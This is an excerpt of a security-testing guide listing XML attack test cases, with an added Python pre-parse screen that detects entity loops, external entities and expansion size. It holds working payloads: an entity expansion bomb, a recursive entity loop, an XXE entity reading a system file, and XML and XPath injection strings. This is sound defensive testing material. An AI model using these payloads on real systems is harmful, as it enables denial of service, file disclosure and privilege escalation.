Hunting Security Bugs

XML is a data format, and data carried in that format can be used to perform attacks in other categories. Remember that character references can be used to include arbitrary characters, including nonprinting characters, and that they are decoded inside entity values as well as inside element content. The following are test cases for XML-specific issues. Refer to Chapter 11.

Sample Test Cases

Test Case: Use XML that isn't well formed.
Description: Crash the parser. Malformed input exercises the parser's error-handling paths; a crash or a hang on bad input is a bug in its own right.

Test Case:
  <!ENTITY % xx '&#x25;zz;'> <!ENTITY % zz '&#x25;xx;'> %xx;
Description: Infinite entity reference loop. The last item, %xx;, references the parameter entity xx, whose replacement text is %zz; (the character reference &#x25; is the percent sign). zz in turn expands to %xx;, so %xx must be converted again, and the entity conversion never terminates. The XML specification forbids recursive entity references (the "No Recursion" well-formedness constraint), so a correct parser reports an error here instead of looping; the test verifies that it actually does.

Test Case:
  <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE something [ <!ENTITY x0 "Developers!"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;"> <!ENTITY x4 "&x3;&x3;"> <!ENTITY x100 "&x99;&x99;"> ]>
Description: Entity expansion bomb. The declarations between x4 and x100 follow the same doubling pattern and are omitted from the listing. When the document references &x100;, the parser first replaces it with &x99;&x99;, which is then replaced with &x98;&x98;&x98;&x98;, and so on. This replacement chain continues until the replacement string becomes "Developers!" repeated 2^100 times, exhausting memory or CPU. This is also known as an XML bomb (or the "billion laughs" attack); a parser should enforce a limit on total entity expansion.

Test Case:
  <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE myTest [ <!ELEMENT secTest ANY> <!ENTITY xxe SYSTEM "c:/boot.ini"> ]> <secTest>&xxe;</secTest>
Description: XML external entity (XXE) attack. If you are testing an application that takes XML input, verify that you cannot gain access to files that are normally not accessible, such as c:\boot.ini, by declaring an external entity that points at them. If the parser resolves the entity, the file contents are substituted for &xxe; and may be echoed back in the application's response or in an error message.

Test Case:
  User1</USER> <USER role="admin">User2
Description: XML injection. Where user input is placed inside an XML document (here inside a <USER> element), the closing tag in the input ends the element the application intended to write, and the remainder of the input adds a second USER element with role="admin". Verify that the application encodes or rejects the characters &, <, >, " and ' before inserting input into XML.

Test Case:
  x')] | //* | //*[contains(name(),'y
Description: XPath/XQuery injection. Where input is placed inside a quoted string in an XPath predicate, the first quote and closing bracket end the intended predicate, the union operator | appends //* (which selects every node in the document), and the trailing fragment reopens a predicate so that the application's own closing quote and bracket still yield a syntactically valid expression. Verify that input is escaped or parameterized before it is embedded in a query.
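The three entity-based test cases above (the %xx;/%zz; loop, the doubling chain, and the SYSTEM entity) can be screened before a document reaches a real parser. The following is an added example, not code from the book or from any product it discusses: a small Python pre-check of the internal DTD subset that decodes character references in entity values (so the &#x25; trick is caught), detects reference loops, flags external entities, and computes the expanded size arithmetically instead of expanding anything. The `bomb()` helper, the 1,000,000-character `max_expansion` budget and the sample documents are constructed for this example.

```python
"""Pre-parse DTD screen for entity-based XML test cases (added example)."""
import re

# Matches <!ENTITY name "value">, <!ENTITY % name "value"> and the
# SYSTEM/PUBLIC forms. Covers the internal-subset shapes used in the
# test cases; it is not a full DTD grammar.
_ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[^\s%"\'>]+)\s+'
    r'(?:(?P<ext>SYSTEM|PUBLIC)\s+)?'
    r'(?P<lit>"[^"]*"|\'[^\']*\')')
_CHAR_REF = re.compile(r'&#(x[0-9A-Fa-f]+|[0-9]+);')
_ENTITY_REF = re.compile(r'[&%]([^\s;&%]+);')


def _decode_char_refs(value):
    """Replace numeric character references, so '&#x25;zz;' becomes '%zz;'.
    A parser does this to an entity literal; the loop test case relies on
    it to smuggle in a parameter-entity reference."""
    def repl(m):
        ref = m.group(1)
        return chr(int(ref[1:], 16) if ref[0] in "xX" else int(ref))
    return _CHAR_REF.sub(repl, value)


def parse_entity_decls(xml_text):
    """Return {name: (is_external, decoded_value)} for each declared entity.
    Parameter and general entities share one namespace here; a name clash
    only makes the size estimate more conservative."""
    entities = {}
    for m in _ENTITY_DECL.finditer(xml_text):
        lit = m.group("lit")[1:-1]
        entities[m.group("name")] = (m.group("ext") is not None,
                                     _decode_char_refs(lit))
    return entities


def expansion_size(name, entities, _stack=(), _memo=None):
    """Length of the fully expanded text of entity `name`, computed without
    building it. Raises ValueError when the entity references itself."""
    if _memo is None:
        _memo = {}
    if name in _stack:
        chain = " -> ".join(_stack[_stack.index(name):] + (name,))
        raise ValueError("entity reference loop: " + chain)
    if name in _memo:
        return _memo[name]
    if name not in entities:
        return 0  # undefined or predefined (&amp; etc.): not counted
    is_external, value = entities[name]
    if is_external:
        return 0  # size unknown; analyze() reports these separately
    total, last = 0, 0
    for m in _ENTITY_REF.finditer(value):
        total += m.start() - last  # literal text before the reference
        total += expansion_size(m.group(1), entities, _stack + (name,), _memo)
        last = m.end()
    total += len(value) - last
    _memo[name] = total
    return total


def analyze(xml_text, max_expansion=1_000_000):
    """Screen one document: external entities, the first loop found, and the
    largest expansion any single entity would produce."""
    entities = parse_entity_decls(xml_text)
    report = {"external": sorted(n for n, (ext, _) in entities.items() if ext),
              "loop": None, "max_expansion": 0}
    for name in entities:
        try:
            size = expansion_size(name, entities)
            report["max_expansion"] = max(report["max_expansion"], size)
        except ValueError as e:
            if report["loop"] is None:
                report["loop"] = str(e)
    report["reject"] = bool(report["external"] or report["loop"]
                            or report["max_expansion"] > max_expansion)
    return report


# Constructed inputs mirroring the test cases above.
LOOP = "<!DOCTYPE t [ <!ENTITY % xx '&#x25;zz;'> <!ENTITY % zz '&#x25;xx;'> %xx; ]>"
XXE = ('<?xml version="1.0"?><!DOCTYPE myTest [ <!ELEMENT secTest ANY> '
       '<!ENTITY xxe SYSTEM "c:/boot.ini"> ]><secTest>&xxe;</secTest>')


def bomb(depth, seed="Developers!"):
    """Build the doubling chain x0..x<depth>; the table omitted x5..x99."""
    decls = ['<!ENTITY x0 "%s">' % seed]
    decls += ['<!ENTITY x%d "&x%d;&x%d;">' % (i, i - 1, i - 1)
              for i in range(1, depth + 1)]
    return '<!DOCTYPE t [ %s ]><t>&x%d;</t>' % (" ".join(decls), depth)


if __name__ == "__main__":
    for label, doc in [("loop", LOOP), ("xxe", XXE), ("bomb100", bomb(100))]:
        print(label, analyze(doc))
```

Running the module prints a report for each constructed input. The size of the x100 chain comes out as 11 * 2^100 characters from the declarations alone, without allocating anything; a parser with no expansion limit would try to build that string. The regular expression recognizes the internal-subset shapes used in the test cases rather than full DTD syntax, so treat this as a screen for test inputs, not as a substitute for hardening the parser itself (disable DTD processing or external entity resolution there).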
